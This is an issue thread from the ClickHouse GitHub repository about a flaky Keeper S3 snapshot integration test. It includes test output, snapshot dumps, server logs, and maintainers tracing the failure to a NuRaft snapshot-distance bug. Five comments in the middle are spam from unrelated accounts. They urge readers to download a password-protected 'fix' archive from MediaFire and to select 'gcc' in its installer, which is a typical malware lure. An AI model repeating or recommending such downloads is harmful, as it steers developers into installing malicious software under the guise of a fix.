### ISSUE TITLE
Integration test test_keeper_s3_snapshot/test.py::test_s3_upload	 is flaky

### ISSUE THREAD

**Issue by shiyer7474** [ClickHouse/ClickHouse#68990]
Found this when checking aretestsgreenyet.com

Integration tests (asan) [2/4] |
test_keeper_s3_snapshot/test.py::test_s3_upload 
[Link](https://s3.amazonaws.com/clickhouse-test-reports/0/cd2e66ba58e1665000b9b02a1fcec73749331618/integration_tests__asan__[2_4].html)

```
E       AssertionError: assert {'snapshot_50.bin.zstd', 'snapshot_200.bin.zstd', 'snapshot_100.bin.zstd', 'snapshot_250.bin.zstd', 'snapshot_150.bin.zstd'} == {'snapshot_50.bin.zstd', 'snapshot_200.bin.zstd', 'snapshot_100.bin.zstd', 'snapshot_150.bin.zstd'}
E         Extra items in the left set:
E         'snapshot_250.bin.zstd'
E         Full diff:
E           {
E            'snapshot_100.bin.zstd',
E            'snapshot_150.bin.zstd',
E            'snapshot_200.bin.zstd',
E         +  'snapshot_250.bin.zstd',
E            'snapshot_50.bin.zstd',
E           }

test_keeper_s3_snapshot/test.py:95: AssertionError
```

The test sets `snapshot_distance `to 50 and then creates 210 entries in keeper. The test then expects 4 snapshots at 50,100,150,200. But the test failed because `snapshot_250.bin.zstd` was also found. The test has not failed with similar symptom in the last 6 months.  I checked the saved snapshots from the test log and notice that there are other entries apart from what the test creates (prefixed with 'test00000') -

```
shiyer7474@siver-dev:/tmp$ strings snapshot_200.bin | tail -10
/test0000000144
/test0000000145
/test0000000146
/test0000000147
/test0000000148
/test0000000149
/test0000000150
node1:9234
node2:9234
node3:9234

shiyer7474@siver-dev:/tmp$ strings snapshot_250.bin | tail -10
/test0000000188
/test0000000189
/test0000000190
/test0000000191
/test0000000192
/test0000000193
/test0000000194
node1:9234
node2:9234
node3:9234

shiyer7474@siver-dev:/tmp$ strings snapshot_250.bin | grep -v test0000000
node1:9234
node2:9234
node3:9234
/keeper
/clickhouse
/clickhouse/sessions
/clickhouse/sessions/zookeeper
C/clickhouse/sessions/zookeeper/c7d2f30c-60ae-4ad6-989e-4f17fdddf3e4
C/clickhouse/sessions/zookeeper/ef61b311-e440-4766-9d0a-0bc3d525af63
C/clickhouse/sessions/zookeeper/a690b71c-3f86-4a74-bb8c-6b3b3ed217bc
/clickhouse/task_queue
/clickhouse/task_queue/ddl
node1:9234
node2:9234
node3:9234
```
Note that snapshot_250 has only entries till `test0000000194 `and snapshot_200 has entries till `test0000000150`

Determinism of exactly 4 snapshots corresponding to the 210 node entries created by the test may be difficult if other internal modules also create entries in keeper. The test could be modified to validate that `atleast `4 snapshots have been created at the end of the test. The test failure rate is not high because the 'margin' of 40 entries was giving room until now - maybe some internal module is persisting state more often and we tipped over.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shiyer7474** [comment]
Thanks @zvonand for alerting! 

In PR https://github.com/ClickHouse/ClickHouse/pull/69013 : more discussions regarding verifying only number of snapshots v/s determinism.

@antonio2368 : Do you suspect something is broken in the interval calculation logic ? Log extract :-

```
2024.09.28 03:34:04.604924 [ 8 ] {} <Warning> KeeperServer: Very small snapshot_distance 50 specified in coordination settings. It doesn't make sense to specify such small value, because it can lead to degraded performance and another issues.
2024.09.28 03:34:04.608292 [ 8 ] {} <Information> RaftInstance: Raft ASIO listener initiated on :::9234, unsecured
2024.09.28 03:34:04.608371 [ 8 ] {} <Information> RaftInstance: parameters: election timeout range 1000 - 2000, heartbeat 500, leadership expiry 10000, max batch 100, backoff 50, snapshot distance 50, enable randomized snapshot creation NO, log sync stop gap 99999, reserved logs 100000, client timeout 5000, auto forwarding on, API call type async, custom commit quorum size 0, custom election quorum size 0, snapshot receiver included, leadership transfer wait time 0, grace period of lagging state machine 0, snapshot IO: blocking, parallel log appending: on                                                            
...
2024.09.28 03:34:06.429841 [ 582 ] {} <Debug> KeeperStateMachine: Created persistent snapshot 50 with path snapshot_50.bin.zstd
2024.09.28 03:34:06.435737 [ 582 ] {} <Debug> KeeperStateMachine: Created persistent snapshot 51 with path snapshot_51.bin.zstd
2024.09.28 03:34:06.630794 [ 582 ] {} <Debug> KeeperStateMachine: Created persistent snapshot 101 with path snapshot_101.bin.zstd
2024.09.28 03:34:06.922483 [ 582 ] {} <Debug> KeeperStateMachine: Created persistent snapshot 151 with path snapshot_151.bin.zstd
2024.09.28 03:34:07.130228 [ 582 ] {} <Debug> KeeperStateMachine: Created persistent snapshot 201 with path snapshot_201.bin.zstd
```

Test start  -

```
2024-09-28 03:34:06 [ 497 ] DEBUG : Sending request(xid=1): Create(path='/test', data=b'', acl=[ACL(perms=31, acl_list=['ALL'], id=Id(scheme='world', id='anyone'))], flags=2) (connection.py:312, _submit)
2024-09-28 03:34:06 [ 497 ] DEBUG : Received response(xid=1): '/test0000000000' (connection.py:410, _read_response)
```

**Comment by antonio2368** [comment]
This test would fail even if we just verified the number of snapshots because 1 extra snapshot was created instantly on the next log index after the first snapshot was created.
I'm trying to figure out why it happened.

**Comment by antonio2368** [comment]
It's a bug with snapshot distance checking https://github.com/eBay/NuRaft/pull/539

**Comment by shiyer7474** [comment]
Wow  @antonio2368 👏
